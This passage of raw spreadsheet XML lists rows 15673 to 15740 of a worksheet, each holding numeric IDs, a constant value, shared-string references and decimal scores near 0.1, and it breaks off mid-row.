    <row r="15673" ht="15.75" customHeight="1">
      <c r="A15673" s="1">
        <v>30218.0</v>
      </c>
      <c r="B15673" s="2">
        <v>3.7395961E7</v>
      </c>
      <c r="C15673" s="2" t="s">
        <v>15123</v>
      </c>
      <c r="D15673" s="2">
        <v>1.0</v>
      </c>
      <c r="E15673" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15673" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15674" ht="15.75" customHeight="1">
      <c r="A15674" s="1">
        <v>31098.0</v>
      </c>
      <c r="B15674" s="2">
        <v>4855192.0</v>
      </c>
      <c r="C15674" s="2" t="s">
        <v>15124</v>
      </c>
      <c r="D15674" s="2">
        <v>1.0</v>
      </c>
      <c r="E15674" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15674" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15675" ht="15.75" customHeight="1">
      <c r="A15675" s="1">
        <v>31105.0</v>
      </c>
      <c r="B15675" s="2">
        <v>4.8612641E7</v>
      </c>
      <c r="C15675" s="2" t="s">
        <v>15125</v>
      </c>
      <c r="D15675" s="2">
        <v>1.0</v>
      </c>
      <c r="E15675" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15675" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="15676" ht="15.75" customHeight="1">
      <c r="A15676" s="1">
        <v>1552.0</v>
      </c>
      <c r="B15676" s="2">
        <v>2.7628352E7</v>
      </c>
      <c r="C15676" s="2" t="s">
        <v>15126</v>
      </c>
      <c r="D15676" s="2">
        <v>1.0</v>
      </c>
      <c r="E15676" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15676" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="15677" ht="15.75" customHeight="1">
      <c r="A15677" s="1">
        <v>2766.0</v>
      </c>
      <c r="B15677" s="2">
        <v>3.511115E7</v>
      </c>
      <c r="C15677" s="2" t="s">
        <v>15127</v>
      </c>
      <c r="D15677" s="2">
        <v>1.0</v>
      </c>
      <c r="E15677" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15677" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="15678" ht="15.75" customHeight="1">
      <c r="A15678" s="1">
        <v>14187.0</v>
      </c>
      <c r="B15678" s="2">
        <v>3.813953E7</v>
      </c>
      <c r="C15678" s="2" t="s">
        <v>15128</v>
      </c>
      <c r="D15678" s="2">
        <v>1.0</v>
      </c>
      <c r="E15678" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15678" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="15679" ht="15.75" customHeight="1">
      <c r="A15679" s="1">
        <v>23262.0</v>
      </c>
      <c r="B15679" s="2">
        <v>5.3203808E7</v>
      </c>
      <c r="C15679" s="2" t="s">
        <v>15129</v>
      </c>
      <c r="D15679" s="2">
        <v>1.0</v>
      </c>
      <c r="E15679" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15679" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="15680" ht="15.75" customHeight="1">
      <c r="A15680" s="1">
        <v>27034.0</v>
      </c>
      <c r="B15680" s="2">
        <v>2.0143508E7</v>
      </c>
      <c r="C15680" s="2" t="s">
        <v>15130</v>
      </c>
      <c r="D15680" s="2">
        <v>1.0</v>
      </c>
      <c r="E15680" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15680" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="15681" ht="15.75" customHeight="1">
      <c r="A15681" s="1">
        <v>27037.0</v>
      </c>
      <c r="B15681" s="2">
        <v>2.0143508E7</v>
      </c>
      <c r="C15681" s="2" t="s">
        <v>15131</v>
      </c>
      <c r="D15681" s="2">
        <v>1.0</v>
      </c>
      <c r="E15681" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15681" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="15682" ht="15.75" customHeight="1">
      <c r="A15682" s="1">
        <v>27220.0</v>
      </c>
      <c r="B15682" s="2">
        <v>2.0974162E7</v>
      </c>
      <c r="C15682" s="2" t="s">
        <v>15132</v>
      </c>
      <c r="D15682" s="2">
        <v>1.0</v>
      </c>
      <c r="E15682" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15682" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="15683" ht="15.75" customHeight="1">
      <c r="A15683" s="1">
        <v>31158.0</v>
      </c>
      <c r="B15683" s="2">
        <v>4899065.0</v>
      </c>
      <c r="C15683" s="2" t="s">
        <v>15133</v>
      </c>
      <c r="D15683" s="2">
        <v>1.0</v>
      </c>
      <c r="E15683" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15683" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="15684" ht="15.75" customHeight="1">
      <c r="A15684" s="1">
        <v>31981.0</v>
      </c>
      <c r="B15684" s="2">
        <v>5.3203807E7</v>
      </c>
      <c r="C15684" s="2" t="s">
        <v>15129</v>
      </c>
      <c r="D15684" s="2">
        <v>1.0</v>
      </c>
      <c r="E15684" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15684" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="15685" ht="15.75" customHeight="1">
      <c r="A15685" s="1">
        <v>33771.0</v>
      </c>
      <c r="B15685" s="2">
        <v>8671379.0</v>
      </c>
      <c r="C15685" s="2" t="s">
        <v>15134</v>
      </c>
      <c r="D15685" s="2">
        <v>1.0</v>
      </c>
      <c r="E15685" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15685" s="2">
        <v>0.1007532956685499</v>
      </c>
    </row>
    <row r="15686" ht="15.75" customHeight="1">
      <c r="A15686" s="1">
        <v>33898.0</v>
      </c>
      <c r="B15686" s="2">
        <v>9198670.0</v>
      </c>
      <c r="C15686" s="2" t="s">
        <v>15135</v>
      </c>
      <c r="D15686" s="2">
        <v>1.0</v>
      </c>
      <c r="E15686" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15686" s="2">
        <v>0.1007532956685499</v>
      </c>
    </row>
    <row r="15687" ht="15.75" customHeight="1">
      <c r="A15687" s="1">
        <v>14913.0</v>
      </c>
      <c r="B15687" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C15687" s="2" t="s">
        <v>15136</v>
      </c>
      <c r="D15687" s="2">
        <v>1.0</v>
      </c>
      <c r="E15687" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15687" s="2">
        <v>0.1005747126436781</v>
      </c>
    </row>
    <row r="15688" ht="15.75" customHeight="1">
      <c r="A15688" s="1">
        <v>14865.0</v>
      </c>
      <c r="B15688" s="2">
        <v>4.1070464E7</v>
      </c>
      <c r="C15688" s="2" t="s">
        <v>15137</v>
      </c>
      <c r="D15688" s="2">
        <v>1.0</v>
      </c>
      <c r="E15688" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15688" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="15689" ht="15.75" customHeight="1">
      <c r="A15689" s="1">
        <v>26128.0</v>
      </c>
      <c r="B15689" s="2">
        <v>1.5928389E7</v>
      </c>
      <c r="C15689" s="2" t="s">
        <v>15012</v>
      </c>
      <c r="D15689" s="2">
        <v>1.0</v>
      </c>
      <c r="E15689" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15689" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="15690" ht="15.75" customHeight="1">
      <c r="A15690" s="1">
        <v>27003.0</v>
      </c>
      <c r="B15690" s="2">
        <v>1.9948284E7</v>
      </c>
      <c r="C15690" s="2" t="s">
        <v>15138</v>
      </c>
      <c r="D15690" s="2">
        <v>1.0</v>
      </c>
      <c r="E15690" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15690" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="15691" ht="15.75" customHeight="1">
      <c r="A15691" s="1">
        <v>30004.0</v>
      </c>
      <c r="B15691" s="2">
        <v>3612938.0</v>
      </c>
      <c r="C15691" s="2" t="s">
        <v>15139</v>
      </c>
      <c r="D15691" s="2">
        <v>1.0</v>
      </c>
      <c r="E15691" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15691" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="15692" ht="15.75" customHeight="1">
      <c r="A15692" s="1">
        <v>32928.0</v>
      </c>
      <c r="B15692" s="2">
        <v>6428793.0</v>
      </c>
      <c r="C15692" s="2" t="s">
        <v>15140</v>
      </c>
      <c r="D15692" s="2">
        <v>1.0</v>
      </c>
      <c r="E15692" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15692" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="15693" ht="15.75" customHeight="1">
      <c r="A15693" s="1">
        <v>11043.0</v>
      </c>
      <c r="B15693" s="2">
        <v>1.8052632E7</v>
      </c>
      <c r="C15693" s="2" t="s">
        <v>15141</v>
      </c>
      <c r="D15693" s="2">
        <v>1.0</v>
      </c>
      <c r="E15693" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15693" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="15694" ht="15.75" customHeight="1">
      <c r="A15694" s="1">
        <v>17407.0</v>
      </c>
      <c r="B15694" s="2">
        <v>4.964626E7</v>
      </c>
      <c r="C15694" s="2" t="s">
        <v>15142</v>
      </c>
      <c r="D15694" s="2">
        <v>1.0</v>
      </c>
      <c r="E15694" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15694" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="15695" ht="15.75" customHeight="1">
      <c r="A15695" s="1">
        <v>24750.0</v>
      </c>
      <c r="B15695" s="2">
        <v>1.1815341E7</v>
      </c>
      <c r="C15695" s="2" t="s">
        <v>15143</v>
      </c>
      <c r="D15695" s="2">
        <v>1.0</v>
      </c>
      <c r="E15695" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15695" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="15696" ht="15.75" customHeight="1">
      <c r="A15696" s="1">
        <v>26139.0</v>
      </c>
      <c r="B15696" s="2">
        <v>1.6031238E7</v>
      </c>
      <c r="C15696" s="2" t="s">
        <v>15144</v>
      </c>
      <c r="D15696" s="2">
        <v>1.0</v>
      </c>
      <c r="E15696" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15696" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="15697" ht="15.75" customHeight="1">
      <c r="A15697" s="1">
        <v>5504.0</v>
      </c>
      <c r="B15697" s="2">
        <v>4.5821171E7</v>
      </c>
      <c r="C15697" s="2" t="s">
        <v>15145</v>
      </c>
      <c r="D15697" s="2">
        <v>1.0</v>
      </c>
      <c r="E15697" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15697" s="2">
        <v>0.1</v>
      </c>
    </row>
    <row r="15698" ht="15.75" customHeight="1">
      <c r="A15698" s="1">
        <v>12982.0</v>
      </c>
      <c r="B15698" s="2">
        <v>3.2686013E7</v>
      </c>
      <c r="C15698" s="2" t="s">
        <v>15146</v>
      </c>
      <c r="D15698" s="2">
        <v>1.0</v>
      </c>
      <c r="E15698" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15698" s="2">
        <v>0.09999999999999999</v>
      </c>
    </row>
    <row r="15699" ht="15.75" customHeight="1">
      <c r="A15699" s="1">
        <v>4891.0</v>
      </c>
      <c r="B15699" s="2">
        <v>4.3869659E7</v>
      </c>
      <c r="C15699" s="2" t="s">
        <v>15147</v>
      </c>
      <c r="D15699" s="2">
        <v>1.0</v>
      </c>
      <c r="E15699" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15699" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="15700" ht="15.75" customHeight="1">
      <c r="A15700" s="1">
        <v>5432.0</v>
      </c>
      <c r="B15700" s="2">
        <v>4.5576773E7</v>
      </c>
      <c r="C15700" s="2" t="s">
        <v>15148</v>
      </c>
      <c r="D15700" s="2">
        <v>1.0</v>
      </c>
      <c r="E15700" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15700" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="15701" ht="15.75" customHeight="1">
      <c r="A15701" s="1">
        <v>19415.0</v>
      </c>
      <c r="B15701" s="2">
        <v>5.5627577E7</v>
      </c>
      <c r="C15701" s="2" t="s">
        <v>15149</v>
      </c>
      <c r="D15701" s="2">
        <v>1.0</v>
      </c>
      <c r="E15701" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15701" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="15702" ht="15.75" customHeight="1">
      <c r="A15702" s="1">
        <v>21191.0</v>
      </c>
      <c r="B15702" s="2">
        <v>1.9325054E7</v>
      </c>
      <c r="C15702" s="2" t="s">
        <v>15150</v>
      </c>
      <c r="D15702" s="2">
        <v>1.0</v>
      </c>
      <c r="E15702" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15702" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="15703" ht="15.75" customHeight="1">
      <c r="A15703" s="1">
        <v>22623.0</v>
      </c>
      <c r="B15703" s="2">
        <v>4.0134334E7</v>
      </c>
      <c r="C15703" s="2" t="s">
        <v>15151</v>
      </c>
      <c r="D15703" s="2">
        <v>1.0</v>
      </c>
      <c r="E15703" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15703" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="15704" ht="15.75" customHeight="1">
      <c r="A15704" s="1">
        <v>31439.0</v>
      </c>
      <c r="B15704" s="2">
        <v>5.018059E7</v>
      </c>
      <c r="C15704" s="2" t="s">
        <v>15152</v>
      </c>
      <c r="D15704" s="2">
        <v>1.0</v>
      </c>
      <c r="E15704" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15704" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="15705" ht="15.75" customHeight="1">
      <c r="A15705" s="1">
        <v>32050.0</v>
      </c>
      <c r="B15705" s="2">
        <v>5373201.0</v>
      </c>
      <c r="C15705" s="2" t="s">
        <v>15153</v>
      </c>
      <c r="D15705" s="2">
        <v>1.0</v>
      </c>
      <c r="E15705" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15705" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="15706" ht="15.75" customHeight="1">
      <c r="A15706" s="1">
        <v>32510.0</v>
      </c>
      <c r="B15706" s="2">
        <v>5716250.0</v>
      </c>
      <c r="C15706" s="2" t="s">
        <v>15154</v>
      </c>
      <c r="D15706" s="2">
        <v>1.0</v>
      </c>
      <c r="E15706" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15706" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="15707" ht="15.75" customHeight="1">
      <c r="A15707" s="1">
        <v>32826.0</v>
      </c>
      <c r="B15707" s="2">
        <v>6219343.0</v>
      </c>
      <c r="C15707" s="2" t="s">
        <v>15155</v>
      </c>
      <c r="D15707" s="2">
        <v>1.0</v>
      </c>
      <c r="E15707" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15707" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="15708" ht="15.75" customHeight="1">
      <c r="A15708" s="1">
        <v>2313.0</v>
      </c>
      <c r="B15708" s="2">
        <v>3.2831819E7</v>
      </c>
      <c r="C15708" s="2" t="s">
        <v>15156</v>
      </c>
      <c r="D15708" s="2">
        <v>1.0</v>
      </c>
      <c r="E15708" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15708" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="15709" ht="15.75" customHeight="1">
      <c r="A15709" s="1">
        <v>18026.0</v>
      </c>
      <c r="B15709" s="2">
        <v>5.1530177E7</v>
      </c>
      <c r="C15709" s="2" t="s">
        <v>15157</v>
      </c>
      <c r="D15709" s="2">
        <v>1.0</v>
      </c>
      <c r="E15709" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15709" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="15710" ht="15.75" customHeight="1">
      <c r="A15710" s="1">
        <v>23282.0</v>
      </c>
      <c r="B15710" s="2">
        <v>5373202.0</v>
      </c>
      <c r="C15710" s="2" t="s">
        <v>15158</v>
      </c>
      <c r="D15710" s="2">
        <v>1.0</v>
      </c>
      <c r="E15710" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15710" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="15711" ht="15.75" customHeight="1">
      <c r="A15711" s="1">
        <v>9701.0</v>
      </c>
      <c r="B15711" s="2">
        <v>5.6367707E7</v>
      </c>
      <c r="C15711" s="2" t="s">
        <v>15159</v>
      </c>
      <c r="D15711" s="2">
        <v>1.0</v>
      </c>
      <c r="E15711" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15711" s="2">
        <v>0.09979423868312756</v>
      </c>
    </row>
    <row r="15712" ht="15.75" customHeight="1">
      <c r="A15712" s="1">
        <v>2630.0</v>
      </c>
      <c r="B15712" s="2">
        <v>3.4560281E7</v>
      </c>
      <c r="C15712" s="2" t="s">
        <v>15160</v>
      </c>
      <c r="D15712" s="2">
        <v>1.0</v>
      </c>
      <c r="E15712" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15712" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15713" ht="15.75" customHeight="1">
      <c r="A15713" s="1">
        <v>5093.0</v>
      </c>
      <c r="B15713" s="2">
        <v>4.4487441E7</v>
      </c>
      <c r="C15713" s="2" t="s">
        <v>15161</v>
      </c>
      <c r="D15713" s="2">
        <v>1.0</v>
      </c>
      <c r="E15713" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15713" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15714" ht="15.75" customHeight="1">
      <c r="A15714" s="1">
        <v>5300.0</v>
      </c>
      <c r="B15714" s="2">
        <v>4.5234835E7</v>
      </c>
      <c r="C15714" s="2" t="s">
        <v>15162</v>
      </c>
      <c r="D15714" s="2">
        <v>1.0</v>
      </c>
      <c r="E15714" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15714" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15715" ht="15.75" customHeight="1">
      <c r="A15715" s="1">
        <v>11995.0</v>
      </c>
      <c r="B15715" s="2">
        <v>2.5916523E7</v>
      </c>
      <c r="C15715" s="2" t="s">
        <v>15163</v>
      </c>
      <c r="D15715" s="2">
        <v>1.0</v>
      </c>
      <c r="E15715" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15715" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15716" ht="15.75" customHeight="1">
      <c r="A15716" s="1">
        <v>13213.0</v>
      </c>
      <c r="B15716" s="2">
        <v>3.416369E7</v>
      </c>
      <c r="C15716" s="2" t="s">
        <v>15164</v>
      </c>
      <c r="D15716" s="2">
        <v>1.0</v>
      </c>
      <c r="E15716" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15716" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15717" ht="15.75" customHeight="1">
      <c r="A15717" s="1">
        <v>14653.0</v>
      </c>
      <c r="B15717" s="2">
        <v>4.0411127E7</v>
      </c>
      <c r="C15717" s="2" t="s">
        <v>15165</v>
      </c>
      <c r="D15717" s="2">
        <v>1.0</v>
      </c>
      <c r="E15717" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15717" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15718" ht="15.75" customHeight="1">
      <c r="A15718" s="1">
        <v>15499.0</v>
      </c>
      <c r="B15718" s="2">
        <v>4.321053E7</v>
      </c>
      <c r="C15718" s="2" t="s">
        <v>15166</v>
      </c>
      <c r="D15718" s="2">
        <v>1.0</v>
      </c>
      <c r="E15718" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15718" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15719" ht="15.75" customHeight="1">
      <c r="A15719" s="1">
        <v>15777.0</v>
      </c>
      <c r="B15719" s="2">
        <v>4.4188808E7</v>
      </c>
      <c r="C15719" s="2" t="s">
        <v>15167</v>
      </c>
      <c r="D15719" s="2">
        <v>1.0</v>
      </c>
      <c r="E15719" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15719" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15720" ht="15.75" customHeight="1">
      <c r="A15720" s="1">
        <v>24119.0</v>
      </c>
      <c r="B15720" s="2">
        <v>1.0003754E7</v>
      </c>
      <c r="C15720" s="2" t="s">
        <v>15168</v>
      </c>
      <c r="D15720" s="2">
        <v>1.0</v>
      </c>
      <c r="E15720" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15720" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15721" ht="15.75" customHeight="1">
      <c r="A15721" s="1">
        <v>29957.0</v>
      </c>
      <c r="B15721" s="2">
        <v>3607687.0</v>
      </c>
      <c r="C15721" s="2" t="s">
        <v>15169</v>
      </c>
      <c r="D15721" s="2">
        <v>1.0</v>
      </c>
      <c r="E15721" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15721" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15722" ht="15.75" customHeight="1">
      <c r="A15722" s="1">
        <v>33148.0</v>
      </c>
      <c r="B15722" s="2">
        <v>7066480.0</v>
      </c>
      <c r="C15722" s="2" t="s">
        <v>15170</v>
      </c>
      <c r="D15722" s="2">
        <v>1.0</v>
      </c>
      <c r="E15722" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15722" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15723" ht="15.75" customHeight="1">
      <c r="A15723" s="1">
        <v>33830.0</v>
      </c>
      <c r="B15723" s="2">
        <v>8949231.0</v>
      </c>
      <c r="C15723" s="2" t="s">
        <v>15171</v>
      </c>
      <c r="D15723" s="2">
        <v>1.0</v>
      </c>
      <c r="E15723" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15723" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15724" ht="15.75" customHeight="1">
      <c r="A15724" s="1">
        <v>33858.0</v>
      </c>
      <c r="B15724" s="2">
        <v>9047021.0</v>
      </c>
      <c r="C15724" s="2" t="s">
        <v>15172</v>
      </c>
      <c r="D15724" s="2">
        <v>1.0</v>
      </c>
      <c r="E15724" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15724" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="15725" ht="15.75" customHeight="1">
      <c r="A15725" s="1">
        <v>7549.0</v>
      </c>
      <c r="B15725" s="2">
        <v>5.1523467E7</v>
      </c>
      <c r="C15725" s="2" t="s">
        <v>15173</v>
      </c>
      <c r="D15725" s="2">
        <v>1.0</v>
      </c>
      <c r="E15725" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15725" s="2">
        <v>0.09964726631393299</v>
      </c>
    </row>
    <row r="15726" ht="15.75" customHeight="1">
      <c r="A15726" s="1">
        <v>4768.0</v>
      </c>
      <c r="B15726" s="2">
        <v>4.3433512E7</v>
      </c>
      <c r="C15726" s="2" t="s">
        <v>15174</v>
      </c>
      <c r="D15726" s="2">
        <v>1.0</v>
      </c>
      <c r="E15726" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15726" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="15727" ht="15.75" customHeight="1">
      <c r="A15727" s="1">
        <v>2019.0</v>
      </c>
      <c r="B15727" s="2">
        <v>3.0740982E7</v>
      </c>
      <c r="C15727" s="2" t="s">
        <v>15175</v>
      </c>
      <c r="D15727" s="2">
        <v>1.0</v>
      </c>
      <c r="E15727" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15727" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="15728" ht="15.75" customHeight="1">
      <c r="A15728" s="1">
        <v>4113.0</v>
      </c>
      <c r="B15728" s="2">
        <v>4.1345373E7</v>
      </c>
      <c r="C15728" s="2" t="s">
        <v>15176</v>
      </c>
      <c r="D15728" s="2">
        <v>1.0</v>
      </c>
      <c r="E15728" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15728" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="15729" ht="15.75" customHeight="1">
      <c r="A15729" s="1">
        <v>20609.0</v>
      </c>
      <c r="B15729" s="2">
        <v>1.3934359E7</v>
      </c>
      <c r="C15729" s="2" t="s">
        <v>15177</v>
      </c>
      <c r="D15729" s="2">
        <v>1.0</v>
      </c>
      <c r="E15729" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15729" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="15730" ht="15.75" customHeight="1">
      <c r="A15730" s="1">
        <v>30746.0</v>
      </c>
      <c r="B15730" s="2">
        <v>4.4103439E7</v>
      </c>
      <c r="C15730" s="2" t="s">
        <v>15178</v>
      </c>
      <c r="D15730" s="2">
        <v>1.0</v>
      </c>
      <c r="E15730" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15730" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="15731" ht="15.75" customHeight="1">
      <c r="A15731" s="1">
        <v>6207.0</v>
      </c>
      <c r="B15731" s="2">
        <v>4.7979205E7</v>
      </c>
      <c r="C15731" s="2" t="s">
        <v>15179</v>
      </c>
      <c r="D15731" s="2">
        <v>1.0</v>
      </c>
      <c r="E15731" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15731" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="15732" ht="15.75" customHeight="1">
      <c r="A15732" s="1">
        <v>6613.0</v>
      </c>
      <c r="B15732" s="2">
        <v>4.9026912E7</v>
      </c>
      <c r="C15732" s="2" t="s">
        <v>15180</v>
      </c>
      <c r="D15732" s="2">
        <v>1.0</v>
      </c>
      <c r="E15732" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15732" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="15733" ht="15.75" customHeight="1">
      <c r="A15733" s="1">
        <v>16360.0</v>
      </c>
      <c r="B15733" s="2">
        <v>4.6114878E7</v>
      </c>
      <c r="C15733" s="2" t="s">
        <v>15181</v>
      </c>
      <c r="D15733" s="2">
        <v>1.0</v>
      </c>
      <c r="E15733" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15733" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="15734" ht="15.75" customHeight="1">
      <c r="A15734" s="1">
        <v>18771.0</v>
      </c>
      <c r="B15734" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C15734" s="2" t="s">
        <v>15182</v>
      </c>
      <c r="D15734" s="2">
        <v>1.0</v>
      </c>
      <c r="E15734" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15734" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="15735" ht="15.75" customHeight="1">
      <c r="A15735" s="1">
        <v>33979.0</v>
      </c>
      <c r="B15735" s="2">
        <v>9400149.0</v>
      </c>
      <c r="C15735" s="2" t="s">
        <v>15183</v>
      </c>
      <c r="D15735" s="2">
        <v>1.0</v>
      </c>
      <c r="E15735" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15735" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="15736" ht="15.75" customHeight="1">
      <c r="A15736" s="1">
        <v>25089.0</v>
      </c>
      <c r="B15736" s="2">
        <v>1.2889295E7</v>
      </c>
      <c r="C15736" s="2" t="s">
        <v>15184</v>
      </c>
      <c r="D15736" s="2">
        <v>1.0</v>
      </c>
      <c r="E15736" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15736" s="2">
        <v>0.09946236559139784</v>
      </c>
    </row>
    <row r="15737" ht="15.75" customHeight="1">
      <c r="A15737" s="1">
        <v>25.0</v>
      </c>
      <c r="B15737" s="2">
        <v>1.050586E7</v>
      </c>
      <c r="C15737" s="2" t="s">
        <v>15185</v>
      </c>
      <c r="D15737" s="2">
        <v>1.0</v>
      </c>
      <c r="E15737" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15737" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15738" ht="15.75" customHeight="1">
      <c r="A15738" s="1">
        <v>65.0</v>
      </c>
      <c r="B15738" s="2">
        <v>1.1303396E7</v>
      </c>
      <c r="C15738" s="2" t="s">
        <v>15186</v>
      </c>
      <c r="D15738" s="2">
        <v>1.0</v>
      </c>
      <c r="E15738" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15738" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15739" ht="15.75" customHeight="1">
      <c r="A15739" s="1">
        <v>399.0</v>
      </c>
      <c r="B15739" s="2">
        <v>1.6670142E7</v>
      </c>
      <c r="C15739" s="2" t="s">
        <v>15187</v>
      </c>
      <c r="D15739" s="2">
        <v>1.0</v>
      </c>
      <c r="E15739" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15739" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15740" ht="15.75" customHeight="1">
      <c r="A15740" s="1">
